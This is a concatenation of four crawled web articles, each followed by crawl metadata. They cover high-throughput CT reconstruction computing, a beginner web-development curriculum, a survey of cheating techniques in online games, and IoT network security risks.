State-of-the-art CT scanners use synchrotron light, which enables very fine resolution in four dimensions. For example, the Advanced Photon Source at Argonne National Laboratory can scan at micrometer-to-nanometer resolution and produce 2,000 4 megapixel frames per second. This results in 16 gigabytes of data produced each second. In describing the challenges of processing this amount of data,Tekin Bicer and colleagues use a high-resolution mouse brain dataset as an example. This dataset is composed of 4501 slices and consumes 4.2 terabytes of disk space, and the reconstructed 3-D image weighs in at a whopping 40.9 terabytes.
A single sinogram (an array of projections from different angles) from this dataset would take 63 hours to compute on a single core. This means the full dataset, comprised of 22,400 sinograms, would take a prohibitively long time to compute. GPUs can provide improved processing time, and vendors like NVIDIA have offerings specifically targeted at the medical CT market. However, the code tends to be device- and application-specific, which means a multi-purpose platform is better served by CPUs. This is particularly true for the massive datasets produced by synchrotron devices.
For more generally-applicable computation, the approach is one likely familiar to those who have performed large-scale computation. Bicer and colleagues developed a platform called Trace to provide a high-throughput environment for tomographic reconstruction. As a single-core environment is hardly a representative benchmark in 2017, their first step was to expand to multiple cores. They used machines with two six-core CPUs and tested with a subset of the mouse brain dataset described above. With a variety of combinations of processes and threads per process, they found that running two processes with 6 threads per process provided the best overall throughput (approximately 158 times faster than the single-core benchmark).
Expanding to multiple nodes provided an additional increase — a speedup factor of 21.6 when moving from 1 to 32 nodes. This also highlights another important consideration. The inter-node communication does not parallelize as well as the computation. This again will come as no surprise to the reader who has experience with parallel code execution. At eight nodes and above, the communication cost exceeds that of the computation. Where two nodes spent 19.7% of time on communication, that rose to 60.1% at 32 nodes. It’s unclear what interconnect was used for this study, but the 2.5 terabytes of of inter-node communication performed for the computation in this subset argues strongly for a high-bandwidth, low-latency interconnect.
The specifics of tomographic data call for further optimization as well. Given the incredible size of the data, efficient use of CPU cache can provide a meaningful improvement in performance. However, the sinusoidal data access pattern of the reconstruction process results in high rates of cache misses — up to 75% in some cases. To address this, Xiao Wang and colleagues have worked on algorithmic approaches to transform the data prior to reconstruction. In their work, they observed a reduction in L2 cache misses from 75% to 17%. Given the large volume and long runtimes associated with large-scale computed tomography, any performance improvement is critical.
Computed tomography plays an increasing role in medical and industrial diagnostics. Argonne’s Advanced Photon Source is currently capable of creating panoramas from multiple frames, resulting in datasets 100 times larger than the single-frame. It’s reasonable to expect that equipment will continue to increase in capability. As a result, high-throughput reconstruction environments will become ever more critical in providing results quickly. | <urn:uuid:99102a9b-d285-4e37-ace4-2677dcea7bcd> | CC-MAIN-2022-40 | https://www.nextplatform.com/2017/02/27/scaling-compute-meet-large-scale-ct-scan-demands/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00289.warc.gz | en | 0.933191 | 874 | 3.03125 | 3 |
This article is contributed. See the original author and article here.
> This is based on the Git Hub curriculum https://github.com/microsoft/Web-Dev-For-Beginners
There are 16 million developers in the world today. Roughly half of those, 8 million are web developers. Web development is therefore a good skill to have as you are looking to land that first job and build a career in tech. But where do you begin to learn all that? With this path
What even is programming? Well, it’s a way to instruct your machine to do things for you. By running statements, you can things like creating a web a page, a simple script or why not a computer game. The possibilities are endless. You do need some kind of text editor to type it all in, we provide that to in this first module.
Not everyone has perfect eyesight or see the colors you do or can even see at all. As a developer you need to realize that when you build programs, you should include everyone. There are specific tags and approaches you can use to make your app usable by anyone, regardless of disability. Be inclusive and build better apps.
When you start out, you might have all your code statements in one file. But there is a way to organize your code so it can be made more readable but also reusable. What you can do is to create named areas, functions, which can be called whenever you need them to carry out a task for you.
Your code can execute differently depending on the values of different variables or some other condition. Having that flexibility makes your application useful in many different scenarios. Learn about IF, ELSE and much more.
Sometimes your data takes on the form of a list. Imagining a recipe, or an ice cream menu or why not a receipt of things. Lists make it possible to store more than one thing and there are constructs that make it possible to operate on lists and get what you need from them such as their sum, or maybe the highest value and so on.
Brought to you by Dr. Ware, Microsoft Office 365 Silver Partner, Charleston SC. | <urn:uuid:2cf37302-8ed1-4ddc-87dc-e3ea300b2ff5> | CC-MAIN-2022-40 | https://www.drware.com/web-development-for-beginners-a-new-learning-path-on-microsoft-learn/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00289.warc.gz | en | 0.949696 | 521 | 3.140625 | 3 |
By: I. Cvitić, M. Sai, D. Peraković
Cheating is simply another method of acquiring resources that enables players to get an advantage over their opponents. Cheating can be defined as an unfair advantage obtained by one player over another in violation of the game’s regulations. In single-player games, players do not have to contend with another player attempting to deceive them into a bad gaming experience. Cheats, which are frequently used in single-player games, enable the user to alter how the game is played. Some disable statistics to ensure that other players’ game experience is not impacted . Figure 1 illustrates several cheating techniques .
Cheating in online games may be done in various forms, ranging from the simplest to the most sophisticated. Some of the standard types of cheating techniques used by the players are as following [6-9]:
- Trust exploitation: Client-side cheating involves altering the game code, configuration data, or both on the client’s end of the transaction. A cheater may use computer software to change data in his game client and the game’s system files, then replace the older versions with new ones. Alternatively, code and data may be modified or replaced on the fly.
- Collaboration: In online games such as online bridge, a group of cheaters may band together to obtain an unfair edge over their honest opponents.
- Escaping: A cheater is just someone who takes advantage of the game’s functioning process. One frequent scenario that we have seen in many online games is escaping: when a cheater knows he is about to lose, he disconnects himself from the gaming system and runs away.
- Driver modification: The gamer may cheat by altering his operating system’s client infrastructure, such as device drivers. For instance, he might alter a graphics driver to render a wall transparent, allowing him to see through it
- Denying service: The cheater sometimes floods the victim’s networks with bogus requests, causing the victim’s network connection to lag, preventing him from responding fast to the game, which causes other participants to remove the victim from the competition.
- Look ahead cheat: Cheater sometimes delays his move in the online games to analyze his opponent’s moves.
- Lack of Authentication: Sometimes, the game server’s authentication protocols are not adequate; therefore, a cheater can get many user IDs of different players. With fake user IDs, cheaters easily create legitimate players.
- Boosting: It is a form of collaboration in which the boosting party helps from the player’s level increase in order to earn in-game incentives.
- Experience Selling: Certain players may elect to sell improved accounts to avoid working as hard to reach a specific level .
For individuals lacking technological expertise or the desire to modify the game, cheating can be accomplished through the use of in-game methods and game faults. Losing an online match might result in a player falling levels or receiving lower-level prizes . This occurs when it is clear that the player will lose, at which point the match is halted, and the device is turned off to prevent the player from continuing. By flouting the established rules, this game subverts the system and defrauds the winning player, who typically earns the match’s prize. Cheating through bugs and loopholes is a distinct form of cheating, as long as the player does so to circumvent the game’s completion requirements . A glitch enables players to bypass a significant chunk of the game in order to complete it faster or grab items that are not generally available. These vulnerabilities may be sold to other players in third-party markets rather than purchased directly from the game provider.
Open research issues and challenges [10, 11]
- Different techniques need to develop that identify the game vulnerabilities that allow malicious users to introduce modes and manipulate various game resources.
- Preventing the exploitation of defects and vulnerabilities through anti-cheat codes in games that alter gameplay when an abnormality is detected.
- Detecting anomalous patterns or behaviors of users or a group of users and modifying their gaming as a result
- Using machine learning algorithms or fuzzy techniques, developing methods for detecting bugs in games.
- Maintaining the integrity of the game’s users’ identities through the use of various authentication techniques or identity checks of legitimate users and inventing new authentication methodologies.
- Effective data encryption methods used during information exchange and the development of new encryption schemes that are difficult to crack assure data transit security between the client and server.
- Saudi, M. H. (2021). Gaming Mobile Applications: Proof of Concept for Security Exploitation. Turkish Journal of Computer and Mathematics Education (TURCOMAT), 12(8), 1761-1766.
- Boluk, S., & LeMieux, P. (2017). Metagaming: Playing, competing, spectating, cheating, trading, making, and breaking videogames (Vol. 53). U of Minnesota Press.
- Fox, J., Gilbert, M., & Tang, W. Y. (2018). Player experiences in a massively multiplayer online game: A diary study of performance, motivation, and social interaction. New Media & Society, 20(11), 4056-4073.
- Parizi, R. M., Dehghantanha, A., Choo, K. K. R., Hammoudeh, M., & Epiphaniou, G. (2019). Security in online games: Current implementations and challenges. In Handbook of Big Data and IoT Security (pp. 367-384). Springer, Cham.
- Yan, J., & Randell, B. (2005, October). A systematic classification of cheating in online games. In Proceedings of 4th ACM SIGCOMM workshop on Network and system support for games (pp.1-9).
- Sahoo, S. R., et al. (2020). Fake profile detection in multimedia big data on online social networks. International Journal of Information and Computer Security, 12(2-3), 303-331.
- Chaudhary, P., et al. (2019). A framework for preserving the privacy of online users against XSS worms on online social network. International Journal of Information Technology and Web Engineering (IJITWE), 14(1), 85-111.
- Gupta, S., et al. (2018). Hunting for DOM-Based XSS vulnerabilities in mobile cloud-based online social network. Future Generation Computer Systems, 79, 319-336.
- Sharma, Y., Bhargava, R., & Tadikonda, B. V. (2021). Named Entity Recognition for Code Mixed Social Media Sentences. International Journal of Software Science and Computational Intelligence (IJSSCI), 13(2), 23-36.
- Sahoo, S. R., et al. (2021). Multiple features based approach for automatic fake news detection on social networks using deep learning. Applied Soft Computing, 100, 106983.
- Lin, D., Bezemer, C. P., & Hassan, A. E. (2019). Identifying gameplay videos that exhibit bugs in computer games. Empirical Software Engineering, 24(6), 4006-4033.
Cite this article:
I. Cvitić, M. Sai, D. Peraković (2021), Cheating in Online Gaming, Insights2Techinfo, pp.1 | <urn:uuid:98151233-743c-4e2f-a24b-430c26040c23> | CC-MAIN-2022-40 | https://insights2techinfo.com/cheating-in-online-gaming/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00289.warc.gz | en | 0.88147 | 1,569 | 3.4375 | 3 |
The original version of this article was published in Network Security Magazines August 2019 edition and has been edited for brevity.
The impending IoT revolution poses a number of privacy concerns. The future network will have more connections between devices than between people, linking up everything ranging from the mundane such as refrigerator sensors, to the critical such as emergency response service. Networks have slowly shifted away from voice and towards data. The explosive growth of IoT will test the limits of both bandwidth and security.
Different devices have varying demands in terms of the volume and complexity of data, as well as importance. When systems are congested, a way of prioritizing the urgency of some data (medical devices for example) over others will be paramount, unless efficient service can be guaranteed consistently. The double-edged sword of data privacy is also of concern. While data has great commercial purpose, a breach can provide criminals with a wealth of logistical and personal information, which may be detrimental to businesses as well as individual users. The potential to mine sensitive data is also amplified in a complex IoT network.
Static sensors, many in remote locations, are an easy target to intercept and carry out denial-of-service attacks, which is even more worrisome when the sensors serve critical operations such as controlling reservoir volumes. IoT also has the unique risk that connected SIMs are roaming and despite improved connectivity, therefore experience a delay between the point of activity and point of reporting.
Lifecycle management is often overlooked, allowing many devices to remain stuck with outdated security software. Even a vulnerable smart toaster poses a fire hazard if correctly hacked. Manufacturers may be tempted to cut corners by equipping devices with inexpensive (and therefore vulnerable) sensor and monitor applications, despite a robust software platform. End-of-life management presents a challenge as SIM cards from devices no longer in use should also be recycled to avoid being put into unsuitable applications at great expense. Finally, changing ownership of devices such as used cars, which carry the owner’s history, present a data protection conundrum.
Because sufficient security was not initially built into networks, these problems have been addressed less efficiently only after the problem is demonstrated. As most networks include both old and new systems, IoT devices will likely be deployed on the older and less secure networks. Signalling firewalls are necessary to protect against the vulnerabilities present in current SS7 networks, and enhanced firewalls will be necessary for IoT communications. A firewall can be considered effective if it is able to inhibit denial of service, IoT SIM fraud and misuse, communication interception, and IoT device tracking.
Collective action among networks, manufacturers, industry associations, security experts, and regulating bodies is critical to allow IoT to thrive without becoming a risk. This requires honesty and diligence on the part of manufacturers. Enterprises work closely with security experts to guarantee a minimum level of embedded network security and ensure protection against malicious attack. Specs should be included in IoT communication platforms that include a handshake for every session. Industry associations must demand a gold standard in IoT security to ensure cellular technology’s future. Finally, governments and regulators must be committed to maintaining control and security of telecom networks should the industry in any way fail to effectively regulate itself, or should they leave networks, operators, and users open to risk. This is accomplished instituting and enforcing minimum security requirements.
The looming prospect of this scale of connected devices is exciting, but we must mitigate the inherent risks or the entire industry may suffer significantly. Success will come about by careful and constant vigilance as well as a concerted effort to employ effective security measures at every stage of development.
Categorised in: Blog | <urn:uuid:9a761912-07fa-4a35-9fc5-cec2082dd6f9> | CC-MAIN-2022-40 | https://www.cellusys.com/2019/08/16/security-in-the-age-of-iot/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00289.warc.gz | en | 0.951928 | 735 | 2.75 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.